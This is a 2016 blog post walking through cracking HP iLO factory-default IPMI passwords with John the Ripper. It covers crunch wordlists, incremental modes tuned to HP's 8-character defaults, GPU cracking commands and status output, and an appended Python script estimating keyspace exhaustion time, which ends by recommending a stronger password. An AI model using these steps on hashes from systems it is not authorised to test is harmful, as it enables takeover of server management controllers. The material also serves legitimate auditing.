Thursday, October 13, 2016

let's crack default factory-shipped hp ilo passwords with john

let's crack default ipmi passwords from hp ilo.
yes let's, shall we?
  
 # mkdir -p /opt/john/dictionaries
 # cd /opt/john/dictionaries
 # crunch 8 8 0123456789 > eightnum.lst                    # 890M
 # crunch 8 8 ABCDEFGHIJKLMNOPQRSTUVWXYZ > eightalpha.lst  # 1T
 # cd /opt/john
 # ./john --session=ipmi32 --fork=8 --format=rakp \
 --wordlist=/opt/john/dictionaries/eightnum.lst out.john

 gross
let's do it with both wordlists.
 # ls /opt/john/dictionaries/ | xargs -t -I files \
 ./john --session=ipmi32 --wordlist=/opt/john/dictionaries/files --rules \
 --fork=8 --format=rakp out.john
   
 now you can let it run against all the numbers and all the alpha. 
 --rules will do crazy upper and lower case (just in case).   
although, you may forgo using wordlists altogether if you're
doing simple alpha or num cracks.
 
  go to /opt/john/john.conf and add the following stanza:  
   
 [Incremental:UpperEight]  
 File = $JOHN/upper.chr  
 MinLen = 8  
 MaxLen = 8  
 CharCount = 26  
   
that uses john's uppercase alphabet chr and runs through every 8-character combination of the 26 letters.
it may take forever, but, yay.  
   
 # ./john --fork=8 --incremental:UpperEight --format=rakp ./out.john  

here's something for hp's default random 8 character string drawn from the 10 digits:

 [Incremental:DigitsEight]
 File = $JOHN/digits.chr
 MinLen = 8
 MaxLen = 8
 CharCount = 10

 # ./john --fork=8 --incremental:DigitsEight --format=rakp ./out.john  

for gpu cracking

first, always check how many gpus you have available  
   
 # nvidia-smi
   
 0, 1 under the GPU heading means you have two.  
   
 when passing the command line options to john,  
   
 get cracking:  
   
 # ./john --session=ipmiopencl --format=rakp-opencl --dev=0,1 --fork=2 ./out.john  
   
 * this means you're calling on devices 0 & 1 (as noted in nvidia-smi) and you are   
 forking the cracking job between the two of them.  
   
 Using default input encoding: UTF-8  
 Loaded 245 password hashes with 245 different salts (RAKP-opencl, IPMI 2.0 RAKP (RMCP+) [HMAC-SHA1 OpenCL])  
 Remaining 116 password hashes with 116 different salts  
 Node numbers 1-2 of 2 (fork)  
 Device 1@crackingrig: Quadro NVS 295  
 Device 0@crackingrig: Quadro NVS 295  
   
 Press 'q' or Ctrl-C to abort, almost any other key for status  
   
 * if you press <enter> <enter>  
 2 0g 0:00:00:28 3/3 0g/s 27871p/s 479640c/s 479640C/s GPU:81°C batash..maglor  
 1 0g 0:00:00:28 3/3 0g/s 26870p/s 475151c/s 475151C/s GPU:77°C 123456..anitie  
   
 you'll see something similar to the above. notice that the GPU is not frying.  
   
 * nb the idea of cores does not apply to gpus, so stick to fork=2 or you might  
  have a really bad day. really. pay no attention to --list=cuda-devices and seeing:  
   
  Number of stream processors:  8 (1 x 8)   
   
  and the thought that it means --fork=8 per processor.
   
  here're some brute-force numbers to dissuade you:
   
  0 0 0g 0:00:00:03 57.52% 1/3 (ETA: 15:30:49) 0g/s 191006p/s 191006c/s 191006C/s GPU:77°C GPU1:81°C administrator10..A3212  
  2 1 0g 0:00:00:02 74.16% 1/3 (ETA: 15:27:49) 0g/s 194691p/s 194691c/s 194691C/s GPU:78°C a5668..admior5632  
  4 4 0g 0:00:00:06 99.38% 1/3 (ETA: 15:26:34) 0g/s 50777p/s 50777c/s 50777C/s GPU:87°C administr3..a971905  
  8 5 0g 0:00:00:03 58.41% 1/3 (ETA: 15:25:17) 0g/s 25871p/s 25871c/s 25871C/s GPU:79°C 5505..A9691   
 16 5 0g 0:00:00:10 51.33% 1/3 (ETA: 15:24:10) 0g/s  3556p/s  3556c/s  3556C/s GPU:80°C A-214..Administrtor214  
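
what those rates mean for anyone still running the factory-default password: this is an added example, not part of the original post. it parses john status lines like the two-gpu ones above, sums p/s and c/s over the forked nodes, and divides the DigitsEight and UpperEight keyspaces by the result. the function names are made up here, and treating c/s as the speed against a single loaded hash is an assumption.

```python
import re

# Two status lines copied from the two-GPU run shown above (one per forked node).
STATUS = """\
2 0g 0:00:00:28 3/3 0g/s 27871p/s 479640c/s 479640C/s GPU:81°C batash..maglor
1 0g 0:00:00:28 3/3 0g/s 26870p/s 475151c/s 475151C/s GPU:77°C 123456..anitie
"""

# Keyspaces of the two incremental modes defined above: CharCount ** length.
KEYSPACES = {"DigitsEight": 10 ** 8, "UpperEight": 26 ** 8}

# p/s = candidate passwords per second, c/s = hash computations per second.
RATE = re.compile(r"(\d+(?:\.\d+)?)([KMG]?)([pc])/s")
SCALE = {"": 1, "K": 1e3, "M": 1e6, "G": 1e9}

def node_rates(line):
    """Return {'p': rate, 'c': rate} for one status line (g/s and C/s are skipped)."""
    rates = {}
    for token in line.split():
        m = RATE.fullmatch(token)
        if m:
            rates[m.group(3)] = float(m.group(1)) * SCALE[m.group(2)]
    return rates

def total_rates(status):
    """Sum p/s and c/s over all forked nodes; each node works a disjoint slice."""
    total = {"p": 0.0, "c": 0.0}
    for line in status.splitlines():
        for unit, rate in node_rates(line).items():
            total[unit] += rate
    return total

def exhaust_seconds(keyspace, status):
    """Seconds to try every candidate: against all loaded salts (p/s) and,
    as an assumption, against a single salted hash (c/s)."""
    t = total_rates(status)
    if not t["p"] or not t["c"]:
        raise ValueError("no p/s or c/s rate found in status text")
    return keyspace / t["p"], keyspace / t["c"]

if __name__ == "__main__":
    for name, size in KEYSPACES.items():
        all_salts, one_salt = exhaust_seconds(size, STATUS)
        print(f"{name}: {size:,} candidates, "
              f"{all_salts / 3600:.1f} h vs all loaded hashes, "
              f"{one_salt / 3600:.1f} h vs one hash")
```

on those two old quadro cards the whole 8-digit space runs out in about half an hour against every loaded hash, so changing the shipped password to something longer and outside both keyspaces is the fix.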
   
